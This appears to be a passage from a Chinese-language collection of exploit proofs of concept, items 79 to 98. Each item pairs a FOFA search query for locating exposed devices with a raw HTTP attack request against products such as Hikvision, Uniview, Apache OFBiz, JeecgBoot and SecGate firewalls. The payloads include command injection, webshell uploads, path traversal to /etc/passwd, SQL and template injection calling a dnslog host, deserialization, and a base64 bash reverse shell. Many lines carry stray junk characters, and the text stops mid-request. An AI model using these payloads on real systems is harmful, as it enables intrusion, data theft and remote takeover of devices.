7 j8 {" `, m9 F; m. K' {GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.15 x* u, y7 K ~" z3 J$ ~; e( p- r
Host: x.x.x.x# E6 d0 [, v/ e3 t2 w/ a: G0 m
6 r3 }+ T' x; ~0 L @
! u, I# @: I$ d4 ~, Q; b79. BYTEVALUE 百为流控路由器远程命令执行- U6 i# g' o1 I3 T1 V
FOFA:BYTEVALUE 智能流控路由器8 v) o9 v2 o9 `4 Q! ]. X
GET /goform/webRead/open/?path=|id HTTP/1.1
+ {6 @6 |) L* @ v- Q0 l" Q+ v+ NHost:IP
/ d t9 @ }/ f' IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.07 `7 q+ i. q, f/ I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 U/ e! x/ L7 i% [
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 i! N7 `4 @2 Z) `1 g4 lAccept-Encoding: gzip, deflate
- P. i$ z+ H9 |, @% b2 W( y" NConnection: close0 }* _6 {0 {, @7 r" u/ e( A
Upgrade-Insecure-Requests: 1
; i+ ?7 b& t- n1 l
7 ?$ I/ j. u" h w. D2 T' z# R3 `, `* Y' w# J, e
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
% R* l; Y3 m0 D2 K. ZFOFA:app="速达软件-公司产品"3 L; k# @& w/ _+ ^5 v
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
5 f$ F | T6 ?' t, k4 B- ^Host: x.x.x.x+ z, S% [' O1 K$ ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* v! |& N8 s" c! o- w
Content-Length: 27
* h' I2 K I" T7 G! t4 h0 mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 D! I4 r; n; I* w' c- l
Accept-Encoding: gzip, deflate. y+ R) T' Q- P) W# f1 E9 E5 V
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* ^. r8 Q* b0 S W) Z5 f
Connection: close
+ F5 |, M$ S" p4 H3 R" |Content-Type: application/octet-stream
6 U; E; S+ P, D/ M. o; PUpgrade-Insecure-Requests: 1
1 U: p6 E5 B4 k. U. T' _+ |: a9 @
% b1 D% I1 B- _9 x o<% out.print("oessqeonylzaf");%>
% e3 `) r; h* w. n. g: b7 |0 W6 C4 J+ t
) D- P! P6 X3 q! ~$ D) G
GET /xykqmfxpoas.jsp HTTP/1.1% E. H: |3 {2 e9 K2 M
Host: x.x.x.x8 F3 D4 W. N' K% }+ I) l: `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 b- n) a/ S5 y o! R1 {8 n4 I. G- QConnection: close2 W1 i; T+ c2 z. e9 A
Accept-Encoding: gzip
3 e" k' M4 T/ D# l/ W# b
# H; M& w5 f& x
+ H6 {7 b' K1 W; ~+ r81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
) t0 n0 F5 H" r8 `) ~FOFA:app="uniview-视频监控"
, G) j% f! I m/ ~$ o7 T' bGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
+ F; e5 ^) L. r6 g9 g2 C: aHost: x.x.x.x7 e# n& C: e6 m e# |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* `+ l: [( S7 g" m
Connection: close" H' t' s( C- L+ C2 b! S
Accept-Encoding: gzip
( `" @# w% R9 A
7 X1 J' m, D4 n l o
; C) y4 z( C; @9 S82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行0 g" u e, t$ m! {9 p- M3 i
FOFA:app="思福迪-LOGBASE"; _; _3 C4 X5 \$ d$ A
POST /bhost/test_qrcode_b HTTP/1.1! E2 ~6 ~! o0 x
Host: BaseURL5 Z5 X/ ?5 {3 M& Q8 e5 W# h2 Q
User-Agent: Go-http-client/1.1
% E9 A$ D9 @0 u$ oContent-Length: 23 G% ?+ b8 I) x/ k% T. e
Accept-Encoding: gzip
- W* ^( A. R0 K u- G; LConnection: close
1 q* g5 { M$ P! a+ ^% P" k/ cContent-Type: application/x-www-form-urlencoded
% k* b: ~4 M) C! TReferer: BaseURL" |7 {; W; Q1 x5 p Q+ j
- k* E M3 q1 E. f* z
z1=1&z2="|id;"&z3=bhost
l2 T5 E/ L* v \) V
% `( `3 _' H. `( s
3 a8 J+ l' p8 v3 Q5 b4 I83. JeecgBoot testConnection 远程命令执行
4 P5 Q L/ b0 Y' }) o% UFOFA:title=="JeecgBoot 企业级低代码平台"* g$ L! I. R2 I- V+ l% L! S- K- g
* c6 t$ s2 |5 C: j) Q Z. s8 t0 B6 P) L) v
POST /jmreport/testConnection HTTP/1.1
$ v( o* V2 a7 B, q mHost: x.x.x.x( l3 X) k5 b* s. e+ \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- j+ w. m. E- {0 q+ fConnection: close' s6 \9 F, r, ~2 ~
Content-Length: 88818 g: f9 a0 X3 [% L. R0 h5 O" o- b
Accept-Encoding: gzip5 f- Z" e6 p& h! k, h4 c2 O- F# h9 H
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"/ ?" C* p% l8 S @% l N* i5 L
Content-Type: application/json0 w3 t5 L# v% f
3 c, e) Z+ i* w3 l
PAYLOAD. G2 E5 ^# e0 h. i" u
/ T- G1 f6 k0 |4 U$ [5 R1 I
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
/ i' s! l$ @2 n3 D( kFOFA:title=="JeecgBoot 企业级低代码平台"
: i) P* V' J9 n/ S, d; U
0 w9 P! e" u0 {" o0 I( s p% L; e6 @7 d& V3 S G
) q8 C) O$ a, `6 f9 }7 p9 {POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
' |& N9 K# D1 [- KHost: 192.168.40.130:8080
' @2 x0 I! y) \0 R8 t2 B1 k$ _; wUser-Agent: curl/7.88.1$ ^7 t1 ]. r3 k' n& f( j" W
Content-Length: 156/ C( F2 {% x7 c- Y( h
Accept: */*' {) ?& d, v, p4 e5 B( S
Connection: close' G+ n" e' W. F5 M
Content-Type: application/json1 C. c4 d. L/ v7 K& B
Accept-Encoding: gzip, y+ j6 y i" ~4 p
# Q/ T2 i" D& T' a{
/ P7 b+ \& k3 F2 G# y# z "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",4 ^ t X% u7 c
"type": "0"' X9 n, J$ X* z9 ?! C8 t% `+ k
}
' x+ J l9 r) Q+ m1 J
7 h: W& H" g! H4 t4 p3 S, R
% N2 C0 S9 O$ f" U( k" e) x; s6 H85. SysAid On-premise< 23.3.36远程代码执行4 W; m) h& w% t
CVE-2023-47246
: Y: [ x' Z) {5 vFOFA:body="sysaid-logo-dark-green.png" 5 m U, ^+ x7 B( ~6 {$ p9 n c& G% S
EXP数据包如下,注入哥斯拉马6 _8 W Y! U( H3 O8 T
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1# y! }* c% g. |1 W9 O9 p" u! b
Host: x.x.x.x) L2 O$ o. ?' d @+ q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 n& W9 v5 L$ d- W- Y
Content-Type: application/octet-stream
! i2 p: ?+ n& k- sAccept-Encoding: gzip
% P- P3 Q9 Y, g9 V: w; N
, [9 E( [& J* a8 ]. N1 ]- HPAYLOAD
* S0 E" \! t4 d4 X |7 s
1 _% M& Z$ h/ F4 M回显URL:http://x.x.x.x/userfiles/index.jsp8 }) j3 T& n9 r ?' r6 z
: X7 F' J- I( L: `. Y }$ {) H86. 日本tosei自助洗衣机RCE8 P2 f7 Y7 r6 z
FOFA:body="tosei_login_check.php"
' R/ k! y4 M7 S$ V! r5 ?1 _7 A4 |# ~POST /cgi-bin/network_test.php HTTP/1.1
7 r p' @ ? f6 ?7 D ?Host: x.x.x.x
6 {& x9 ]4 R) J. s, E9 OUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36) b0 \7 T( Z8 q9 {+ U
Connection: close' r: P( d! _) S4 X( \
Content-Length: 44/ T$ ?# g- k: O$ ]0 s7 g
Accept: */*
, `- f% [5 c8 n# ~$ O5 p) x3 H5 XAccept-Encoding: gzip& {% A" p& J! h1 C4 P
Accept-Language: en( z' n- [3 i, K2 b! R* o
Content-Type: application/x-www-form-urlencoded
) g5 l6 l$ Z( Q; r) A
# S; h' y# q& Mhost=%0acat${IFS}/etc/passwd%0a&command=ping( P1 ~. }: ~9 U2 G: J: G# [, y
( A8 F/ [" d% v8 r
$ [ j; }: Z. G" X+ q87. 安恒明御安全网关aaa_local_web_preview文件上传
2 Q) M& n+ a, x' iFOFA:title="明御安全网关"4 ~5 ?3 y0 r) k+ _
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.18 m% O; Q" h- n4 v4 n
Host: X.X.X.X& r w8 L3 j: ?2 _, B& s/ D. f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 P9 a! I7 D) |2 t
Connection: close
* t. \ A) C& ?- pContent-Length: 198
5 e+ ~% E- Q1 P$ |) c" R/ yAccept-Encoding: gzip# f9 D3 k! x" S! Y; M
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd8 G( _- D. M+ Z5 U4 ]7 O' g7 q0 z8 H4 @1 H
5 ?- n, C* t4 @4 u- L2 J' l V--qqobiandqgawlxodfiisporjwravxtvd
) g- p. J' c9 G5 \Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"5 g, O: x3 t: h- r$ F9 }7 D) T' _
Content-Type: text/plain0 {4 x- V2 Q B7 x+ d+ {' z, f$ Q! y
2 Z. I R, m" B! v2ZqGNnsjzzU2GBBPyd8AIA7QlDq
! J/ z' m, V! m* ~0 v/ i--qqobiandqgawlxodfiisporjwravxtvd--
7 q$ x1 Q! K! ]+ Q9 `
2 b( {1 i, l# e4 t
3 A k7 j; w, l, j/jfhatuwe.php
0 N5 G. a# w7 q. o- ?
' {* v8 t( A3 E# E: s; S& A88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
7 F+ k, n/ ]+ l& eFOFA:title="明御安全网关"
* s! q X2 ~1 D; \; lGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1( Z* v8 r. O: y
Host: x.x.x.xx.x.x.x
' Z3 d# \/ `* ?6 {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: l! P5 e' ~' Z7 g9 A* M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ n7 k( R2 h7 l* N# ~* KAccept-Encoding: gzip, deflate, ^5 E( y' x3 O9 z0 F
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ Y" y1 P/ d0 i& C3 Z
Connection: close
7 F$ U' ]1 d. x& B
/ E! F: t' ?) ?4 U! W- n1 m6 W8 K: e
/astdfkhl.php
$ r/ A1 M; ]6 ?& `5 a1 G/ [3 \1 p% D/ n; F6 ?$ M. t
89. 致远互联FE协作办公平台editflow_manager存在sql注入, j. U5 [% M# X/ {0 L/ i; p4 \7 f
FOFA:title="FE协作办公平台" || body="li_plugins_download"
$ p$ P( c' H, T- YPOST /sysform/003/editflow_manager.js%70 HTTP/1.1# W- W2 {, v& T) Y$ F3 n( F
Host: x.x.x.x! G: z) `- o; F; R8 u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) T5 m- T# F# d2 ]
Connection: close+ f7 ]$ B/ N' {* L
Content-Length: 41
# |* i* U) ~! _+ Q4 v( W' x0 CContent-Type: application/x-www-form-urlencoded( [5 q" ^ S2 ?2 D; r% D5 M
Accept-Encoding: gzip
! ^7 z7 T) m; e5 I9 r" P% g( P0 \: ^% g* n3 z' h7 y/ a; ]
option=2&GUID=-1'+union+select+111*222--+
x$ r3 q; n* d h6 \
" a9 R: C* ~ ?" C( _& ~% P# z+ @- Q* }* c# r5 w
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
8 Y6 ?+ ^' W+ m* H8 j+ N: z9 eFOFA:icon_hash="-1830859634"0 i& v S' W! t) a
POST /php/ping.php HTTP/1.1! T8 v) }2 G& l/ j7 g* B6 A3 D5 @
Host: x.x.x.x+ G/ Q, b; h( }/ I7 |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
+ b$ Z1 M$ W: h: y: E8 z! aContent-Length: 51
$ O4 s* s; K, M! \6 S$ QAccept: application/json, text/javascript, */*; q=0.01
# E7 L% \, V' {8 v! \ I P) cAccept-Encoding: gzip, deflate
7 b% F& I Q* c/ `3 w& ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; \8 \1 J9 Z4 W7 F6 gConnection: close( Y7 S4 I# @1 ^5 j c
Content-Type: application/x-www-form-urlencoded2 n6 |' X( {& b/ X2 j' q8 p9 y, f
X-Requested-With: XMLHttpRequest h( E" e$ w& U+ q( p! X6 r7 s# N
5 B9 ~4 a, J9 e. e0 ~
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
9 P# R9 X9 d: ^4 l4 g4 W6 M" J0 ~ S3 C
4 ] M. k" d0 G0 {# I91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取' f' H/ u+ u/ e/ i( h& ?( Y4 X
FOFA:title="综合安防管理平台"
7 v B9 I4 g. }- BGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1% ~, W; V z7 a3 m7 o. \
Host: your-ip/ {( h! h2 K0 ?* i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
. P/ v6 J0 P% u' FAccept-Encoding: gzip, deflate* } t( }: o9 x. I* W/ Y! M Q
Accept: */*7 u1 C- D6 k* ]2 c- ?3 ?- r9 M
Connection: keep-alive$ N: T/ L9 D+ ~. q$ ^, v: u' f
& `' ?& X: N7 k: ^
5 f2 _- d. ]0 o8 ~
4 H! U1 e7 z/ g
92. 海康威视运行管理中心session命令执行" A* x6 o, Y7 W* j: a" B1 z* a
Fastjson命令执行) {5 ]/ R' O; D
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76") g6 J) _8 }$ }7 m% ]% F
POST /center/api/session HTTP/1.1, d$ [3 W. I: B* ^ q9 z4 L
Host:. x4 l; Z" j! O' |0 ]
Accept: application/json, text/plain, */*+ a# J. X1 d2 B* x& j4 V- z7 g9 r1 x
Accept-Encoding: gzip, deflate4 i# g$ b2 s8 K$ I
X-Requested-With: XMLHttpRequest
c# h$ s6 }$ P$ D$ v/ h+ NContent-Type: application/json;charset=UTF-8" i7 [: X% ]3 Y
X-Language-Type: zh_CN
) K7 U( c: e7 V' ]' jTestcmd: echo test+ z, X6 m7 W2 m S& o4 C8 S' G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
. A# }7 J- l# G Y$ |$ ^Accept-Language: zh-CN,zh;q=0.9
( L$ }9 f" {6 n" `% q; DContent-Length: 5778
' Q* C, i6 w, v3 ~2 ~$ ]* T3 U- O) @; e/ }5 V: c( g/ b
PAYLOAD8 \6 y6 _* v7 H7 b) C" f
7 {- Q2 O+ n1 T& k/ y b, p5 E G! j! Y0 y! S8 t+ I
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
9 z* [( |; H) f. \! U$ hFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="2 n. [3 n H0 Q. y) Y3 Y( g
POST /?g=app_av_import_save HTTP/1.19 T$ W5 g3 m( V& M n- [
Host: x.x.x.x
3 r3 c& E9 p* m1 V4 HContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
. I( t0 y+ A2 lUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 p$ r! ~! B; b* M4 C% s2 f6 J; v- n: u6 ]7 n/ Q
------WebKitFormBoundarykcbkgdfx2 J2 L1 `$ x6 p' h
Content-Disposition: form-data; name="MAX_FILE_SIZE"8 U* k# s/ D$ ~3 T- R- ^
) W1 w0 W4 L1 l, C2 V0 X10000000' x4 }4 R# R+ _
------WebKitFormBoundarykcbkgdfx
& @% ]) K) [0 _3 t! nContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
$ I9 ^. [1 z4 x8 R x. M+ `Content-Type: text/plain( b8 \0 Z9 q; ]2 q
' V( D1 R7 n4 E* K$ D4 \0 C2 @
wagletqrkwrddkthtulxsqrphulnknxa# c+ l8 F1 y: E& B' E
------WebKitFormBoundarykcbkgdfx: j6 W, o h( n& p1 n
Content-Disposition: form-data; name="submit_post"# V, }2 w) a: l0 j. U$ Q- x% K
5 Y0 `& ]$ A! i
obj_app_upfile
% o$ l# K+ V; U$ c, N------WebKitFormBoundarykcbkgdfx
% Y' M* V9 W! @+ tContent-Disposition: form-data; name="__hash__"
" L) a. ?. D5 F8 w, n
- T; j' ?; \0 _# {& g. j0b9d6b1ab7479ab69d9f71b05e0e9445
# a3 c8 r2 h" Q! j------WebKitFormBoundarykcbkgdfx--
# q5 [4 t7 G1 T( F5 Q. i0 ?! H+ n& H+ b! q1 m0 G* y2 }/ k
. B! I( y, l- F9 y. z+ TGET /attachements/xlskxknxa.txt HTTP/1.1% e! J( M7 U4 I8 B
Host: xx.xx.xx.xx" @! V8 N5 A2 x* z0 K5 o+ z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
$ p5 s1 ~$ ^& C& L
- R# e1 {# }+ E* X$ I8 o% \4 p
' {8 |# m6 [8 `1 w; P7 x2 r94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传2 G0 g5 V3 _0 s) A5 X, `( ?4 y0 `
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
- J9 {2 s+ l# u, \POST /?g=obj_area_import_save HTTP/1.1
8 X+ _: C% y! [: o" v2 p0 _- ^; RHost: x.x.x.x
# F* o- T$ Z( W% YContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt9 t" K+ A, i" O) z- S# S/ \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36/ o$ m" |9 @; Y
, k6 h+ u9 G; b9 j5 ~
------WebKitFormBoundarybqvzqvmt
O# l5 K% S0 k2 t, U% @- l$ P, f ?Content-Disposition: form-data; name="MAX_FILE_SIZE"/ v! |# |) F, ~ D# j
" t6 P# |- m: `1 Q9 \ k10000000
: r# Z4 y" \, O" A------WebKitFormBoundarybqvzqvmt
, v! X$ w9 H& g" W, ?Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"( r: k# z8 W3 w1 Q/ |2 L! ?9 q# ]: ^
Content-Type: text/plain
& A8 B+ N# l5 {. k- ?* D7 F; O1 [. k3 v; f
pxplitttsrjnyoafavcajwkvhxindhmu
+ j& e4 [, ^$ V* c8 Z; y------WebKitFormBoundarybqvzqvmt
3 X' p7 N) y6 Z5 `Content-Disposition: form-data; name="submit_post"
2 H* Z0 b* |) w4 H5 M, z* m9 w+ B; T: B+ X! \
obj_app_upfile
0 s+ W5 X, O% `7 E9 P7 C# S& d( N6 x P------WebKitFormBoundarybqvzqvmt
& h/ f1 }/ g3 E+ LContent-Disposition: form-data; name="__hash__"2 f/ s: Y! |# }
5 R+ s$ [/ m7 H$ D* i3 u6 o6 ]6 O
0b9d6b1ab7479ab69d9f71b05e0e9445 M# H2 M- Z- j( j# H3 X3 }
------WebKitFormBoundarybqvzqvmt--
9 V1 |" M6 ~+ E3 }5 ]9 }/ o; t8 r$ `2 x' F4 ~: v' p
& u( P5 [" a' D1 }" j/ j
. e3 j9 R3 y$ @& m7 rGET /attachements/xlskxknxa.txt HTTP/1.15 R8 q) h- o, `- l) J3 v- C9 |0 L
Host: xx.xx.xx.xx0 g* O2 ^2 d Q9 c$ S. \
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.362 g1 t/ U& p" M5 N5 M( x
. ^8 u4 a2 C! q& n* r" E
" t7 E* K0 e( M
! U0 H8 _( ^' g95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
% |( ]3 j( ]9 F/ w, X/ i+ BCVE-2023-49070
Y4 q0 t# z3 k1 j8 U6 ~6 ?! fFOFA:app="Apache_OFBiz"5 o* m' p! u1 B
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.19 ^; K8 j3 u, a2 p e$ v0 K8 [$ y
Host: x.x.x.x
; J8 A: o- _2 p# d* r' YUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
1 S% m0 C0 c2 O" J RConnection: close
/ I3 F! r$ b. [ [Content-Length: 889( r& l3 @7 b7 }. }0 a; z
Content-Type: application/xml
. H- G8 K' \ L! H* h- \3 YAccept-Encoding: gzip& q% a/ y/ _; c8 i N" @" p2 p
( a2 k- G+ U0 l+ S- C<?xml version="1.0"?>4 u# m# S1 a# C2 h
<methodCall>
, P" r# ? ^: M: r x2 a6 U }/ x <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>- L) D* H, j l" p
<params>& J. ]/ i( K! F' b
<param>1 F2 G" ~! F/ X/ W W2 I6 Q
<value>
0 S; R5 T) R. Y1 ` A o, K& W <struct>
1 {9 C3 }: J) }, P2 s <member>6 |8 K1 K9 r# w0 ]9 P* r
<name>test</name>
' {- ^* b* X( c- I <value>
/ k! r6 u/ w; \1 N <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
) d O3 a7 {, z! @- n </value>+ V" d1 `# z- `/ S
</member>6 y2 }( B2 E n R- J8 K
</struct>! e, j4 Z7 u, {& `+ Z4 m5 ?+ m
</value>
3 b* N5 L$ h& C* s2 R# r: E- [ </param>
% A7 p7 n' u( [/ n </params>
( F" ]+ }' ^" ?, o</methodCall>
/ s% x7 P% W ?+ D" f
7 e C" v! q! y5 b/ i3 y4 `5 Z6 e1 {& V$ I$ A7 D$ ^
用ysoserial生成payload
7 m1 s& T/ ?8 o) x7 b! J- m! Sjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
& X; L+ p( `9 a" X$ e* b
3 _0 ?; v% W4 r: ^. I( X0 m$ X. l; P
将生成的payload替换到上面的POC; F4 h7 R2 D7 N8 w" s8 y# \% R4 ?, {- {
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
a4 C i x: p7 b9 {Host: 192.168.40.130:8443
$ y" x4 U* t5 N. y3 ^" PUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36$ w6 `' Q; h( i7 ?+ w& p7 ~! v, B; ^- n. m
Connection: close, B: _) |3 Z" M8 s2 a
Content-Length: 889
0 i5 e+ x( D4 y2 hContent-Type: application/xml* s4 _0 i5 t7 ]9 m* ]2 R) G
Accept-Encoding: gzip
; E8 O+ W, z6 B. ]( N
2 f" E; ?3 b$ \1 dPAYLOAD2 m2 m: M( ~* e- ~/ Z7 }; Q+ G
1 _# d" P: m; Z& `1 [96. Apache OFBiz 18.12.11 groovy 远程代码执行
: ]8 n S7 | e: Q5 SFOFA:app="Apache_OFBiz"
$ N9 l! z0 S% j) u0 m9 H0 mPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.15 [3 S j% O& }, Z) M, k6 Z
Host: localhost:8443
4 c' k. M* E: hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.04 C3 k. {- M, e% G: X2 G# `
Accept: */*
9 U6 M9 l. A ]- eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. c/ i1 W: r( H' xContent-Type: application/x-www-form-urlencoded
' ^, r8 S6 O$ BContent-Length: 55
. [, O, b& F& o2 \9 E
# M- F: G# j6 _ z1 [groovyProgram=throw+new+Exception('id'.execute().text);' g& t% n% s4 g
3 q8 o* v* ~8 J3 y# f! \0 E
' g: ~* g1 y; s/ M' ~
反弹shell; h9 f* d+ |- W) k
在kali上启动一个监听
2 p& Q3 P8 ? g; k9 |6 Bnc -lvp 7777
9 u0 k+ [6 y2 Z* P) u( {7 a4 X
/ ~# a8 P8 X# q8 _- e. X: SPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
1 _- b% g+ v9 n9 { U+ W- zHost: 192.168.40.130:8443
5 }4 J3 G9 Q4 t0 g, J* Z/ o; m6 PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
) {0 x; h8 s2 g9 DAccept: */*3 i" ?! \2 l8 a* q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% l f4 m w5 _) B6 [, _Content-Type: application/x-www-form-urlencoded8 Y/ o' H3 A' {
Content-Length: 71
+ c* v4 |+ P8 T
- o k% Q% X" B: _% [6 {+ }2 ^groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();% [2 B5 k4 G+ f* Y' t
: F2 G0 T) I! i0 b
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
# b ?& D& C: b, z: a" UFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"* M% a& a3 G3 D+ u4 Q
GET /passport/login/ HTTP/1.1
0 G/ c9 z0 Z' G. uHost: 192.168.40.130:8085
) V L4 C" P$ x# I; VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. V. g. _& a8 D6 r4 b7 S# yAccept-Encoding: gzip: m& x$ e( t6 o! ~
Connection: close
5 ^2 s3 y$ Y& N$ X5 b! ZCookie: rememberMe=PAYLOAD& v' B a. d6 i% o4 O; G
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"+ A$ n) i7 G4 x7 ~1 j1 A$ Q c
) J' D' k3 h3 I& l7 U
& K& }& n p+ i. ]8 ?3 x98. SpiderFlow爬虫平台远程命令执行0 }. o; S* k! q# e" f; @1 a
CVE-2024-01950 L% t! ^* k, h/ L" H4 f
FOFA:app="SpiderFlow"
+ r' q5 _* R' X8 e9 P+ r6 r* GPOST /function/save HTTP/1.1
5 e! s! u7 ^. i/ u2 THost: 192.168.40.130:8088# C9 c; n5 P$ T7 t! ]# _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
1 K! n3 q2 O8 w- r* q5 i1 BConnection: close
9 P5 p, o. D/ s- ?7 u' ?Content-Length: 121, ^5 {8 _8 z: E
Accept: */*
0 u2 H3 J+ U1 f& L/ y+ p! u" U; JAccept-Encoding: gzip, deflate
7 z9 @+ x7 T3 |6 ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 J! I. {1 b; t N- Y0 j7 }4 gContent-Type: application/x-www-form-urlencoded; charset=UTF-8" _' B5 R p6 }+ ]
